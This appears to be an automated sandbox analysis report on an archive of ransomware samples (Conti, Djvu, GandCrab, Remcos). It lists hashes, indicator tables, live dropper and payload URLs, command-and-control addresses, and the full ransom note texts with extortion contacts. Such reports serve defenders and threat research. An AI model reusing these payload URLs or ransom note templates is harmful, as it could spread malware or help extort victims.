conti | e876044c37cc3f095ae06e90abf8c4acf3f51e8073e07f8db8d7759d5979830b

Analysis

max time kernel
82s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02-10-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00467.7z
Size

45.7MB
MD5

5f627fc7873e169b68e9ef7b451af4e7
SHA1

0f93fa259755ebb3db906eeec451e7d33f70baf1
SHA256

e876044c37cc3f095ae06e90abf8c4acf3f51e8073e07f8db8d7759d5979830b
SHA512

840ddebf95227df1e958e8597d7ef65c5efefd714b09b6334bfd20deae9088a852b6abe104d89a8bf08b5c0eb2c7838d7ca599e95bea86158f246f0c669f17d3
SSDEEP

786432:EIZpaUGmOROZa4JakO54pLGERvqY/bLd6Q1SYZxdzqw4rxvttrDDo/ongF4m:v3GmOGa/9GG2x5zZLzqJxvnrgQngF4m

Score

10^/10

conti djvu gandcrab remcos agilenet backdoor defense_evasion discovery evasion persistence pyinstaller ransomware rat upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/880265796767608892/882377555729063987/New_Text_Document.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/880265796767608892/881902176195186728/New_Text_Document.txt

Extracted

Path

C:\Users\Admin\Desktop\index.html

Ransom Note

<!DOCTYPE html> <html lang='en'> <head> <meta charset='UTF-8'> <meta http - equiv='X-UA-Compatible' content='IE=edge'> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <title> Document </title> </head> <body> <h2>What Happened to My Computer?</h2> <p> Your important files are encrypted. Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service. </p> <h2>Can I Recover My Files?</h2> Sure. We guarantee that you can recover all your files safely and easily. But if you want to decrypt all your files, you need to pay. You have 24 hours to submit the payment. After that the price will be doubled. Also, if you don't pay in 7 days, you will not be able to recover your files forever. <h2>How Do I Pay?</h2> <p> Payment is accepted in Bitcoin only. For more information, click <About bitcoin>. </p> <p> Please check the current price of Bitcoin and buy some bitcoins. For more information, click <How to buy bitcoins>. </p> <p> And send the correct amount to the address specified in this window. </p> <p> After your payment, click <Check Payment>. Best time to check: 9:00am - 11:00am GMT from Monday to Friday. </p> <p> Once the payment is checked, you can start decrypting your files immediately. </p> <h2>Contact</h2> If you need our assistance, send a message by clicking <Contact Us>. <p style='color: red;'> We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets updated and removes this software automatically, you will not be able to recover your files even if you pay! </p> </body> </html>

URLs

http

Extracted

Family

djvu

http://tbpws.top/fhsgtsspen6/get.php

Attributes

extension
.efdc
offline_id
rCmd3j4aykEBx0X7GSZFXZTRaA1p1vOlNlSS59t1
payload_url
http://securebiz.org/dl/build2.exe

http://tbpws.top/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-8FD9fC02w8 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0332gDrgo

rsa_pubkey.plain

Extracted

Path

C:\ProgramData\readme.txt

Family

conti

Ransom Note

All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.xyz/ YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- ZNBmQgFGbXCmtCB0aaZmMTpHL2YtecUgu6blxIMU12WwvHaAt0PdnKmkdK1zz4PQ ---END ID---

URLs

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

https://contirecovery.xyz/

Signatures

Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
ransomware conti

Detected Djvu ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/7684-1663-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/7684-1664-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

GandCrab payload 6 IoCs

resource	yara_rule
behavioral1/memory/6048-1643-0x00000000020A0000-0x00000000020B7000-memory.dmp	family_gandcrab
behavioral1/memory/6048-1642-0x0000000000400000-0x000000000045F000-memory.dmp	family_gandcrab
behavioral1/memory/7116-1750-0x0000000000400000-0x0000000000444000-memory.dmp	family_gandcrab
behavioral1/memory/7116-1751-0x0000000001FA0000-0x0000000001FB7000-memory.dmp	family_gandcrab
behavioral1/memory/9396-3134-0x0000000002210000-0x0000000002227000-memory.dmp	family_gandcrab
behavioral1/memory/9396-3133-0x0000000000400000-0x0000000000430000-memory.dmp	family_gandcrab

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
ransomware backdoor gandcrab
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
8236	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe

Executes dropped EXE 21 IoCs

pid	Process
3916	HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
3836	HEUR-Trojan-Ransom.MSIL.Blocker.gen-23b8ae84b0edc8f3e97582280a2cc11010f3f8dbc3a9bb79f393cb89566c239d.exe
2256	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
3896	HEUR-Trojan-Ransom.MSIL.Blocker.gen-3dcf0e71db3e32e6469c95a11ac0d91239a9c21fe3fc21721cfc81968e8937fd.exe
4480	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
3044	HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
2344	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
3464	HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
536	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5016	HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
4792	Setup.exe
4164	smss.exe
5836	Setup.tmp
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5324	HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
5864	zbhnd.exe
3332	HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
6328	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-edfe3f35441f8be60eaf3c05d8aef4a4fe3ef9e1f87888639004894e2add2621.exe
6708	rundll32.exe
7064	HEUR-Trojan-Ransom.Win32.Crypmodng.gen-a6fcb7942325927a28b7514db76fcea2a664a5a0bb7df40ef2f5fa4bb22277d5.exe
7104	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-fe9c62db424aa7f463f26c4acb5fa457a0378463689d409d902461de2e253093.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Wine	HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe

Loads dropped DLL 45 IoCs

pid	Process
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5836	Setup.tmp
5836	Setup.tmp
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5836	Setup.tmp
5836	Setup.tmp
3464	HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
3464	HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
3464	HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
3464	HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe
5940	HEUR-Trojan-Ransom.Python.Agent.gen-1654ca63d48155a0567b0d4e3ff743e8cb31f9ff3f0570953c459a48c762bc2b.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
11872	icacls.exe
11244	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/3916-1353-0x00000000068D0000-0x00000000068F8000-memory.dmp	agile_net

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rundll32.exe"	HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec885ee82b9ab2f53977d7abcff342deebad924ef365f316047206cf9c75930d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\virus = "C:\\Users\\Admin\\Desktop\\00467\\HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe"	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
69	api.2ip.ua
271	api.ipify.org
284	api.ipify.org
350	api.2ip.ua
68	api.2ip.ua

Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Proxy
T1090

Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
8312	cmd.exe
10224	cmd.exe
10376	cmd.exe

UPX packed file 21 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/6328-1539-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/files/0x0007000000023997-1638.dat	upx
behavioral1/memory/6328-2804-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/7240-2859-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/files/0x000c00000002350e-3149.dat	upx
behavioral1/memory/10848-3283-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/7240-3282-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/10848-3301-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/11500-3353-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/11500-3361-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/7184-3371-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/11696-3378-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/8524-3396-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/11976-3422-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/7668-3441-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/8320-3449-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/6328-3580-0x0000000000400000-0x00000000005BB000-memory.dmp	upx
behavioral1/memory/11032-3619-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/11516-3720-0x0000000000400000-0x000000000042F000-memory.dmp	upx
behavioral1/memory/11032-3778-0x0000000000400000-0x0000000000426000-memory.dmp	upx
behavioral1/memory/11984-3779-0x0000000000400000-0x000000000042F000-memory.dmp	upx

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x00070000000234d6-184.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
7200	6256	WerFault.exe	168
7464	6048	WerFault.exe	167
6828	6916	WerFault.exe	186
5068	456	WerFault.exe	182
2616	6848	WerFault.exe	183
6280	7860	WerFault.exe	203
9920	9396	WerFault.exe	242

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-2bc7e232f0a3b4fd35fe3c374dc94004a552fc9104115bd5a3801ebec3ecfac3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Encoder.gen-fd1b69147cf3a8565c3c0079077d95652a81b041f3d1588ef2ef9b0fd5ab0e70.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Crypmod.gen-7fbeac1dca907f4c04fec45a1228c9277f03930355eeac30d101bbce7e2733de.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-22078d12aebf61239184da2dcf6462bc4b2a18e0a78a0d06f393f7a56a57ea66.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.gen-1478ffa075fe6a99c8dcc069f3dbd2f10c555920bc28ba700ef5f37f060dba5c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.pef-398005e44ca0d46567f084c984785936d42e4f4681c69412a30cce99b97c4fce.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zbhnd.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
11252	taskkill.exe
7260	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Internet Explorer\IESettingSync	HEUR-Trojan-Ransom.MSIL.Crypren.gen-81331f7bbcf9c0b0f000ff6ab02dcc40b30c0cce5b3daa23f9efb1bc70fab4e8.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	HEUR-Trojan-Ransom.MSIL.Blocker.gen-d2de58f5739e62e9b5dd15b1a92a248daf5c79d5052bb01308bbe9a1b6521f29.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
7564	schtasks.exe
7208	schtasks.exe
9924	schtasks.exe
10160	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1196	powershell.exe
1196	powershell.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
2456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
3456	taskmgr.exe
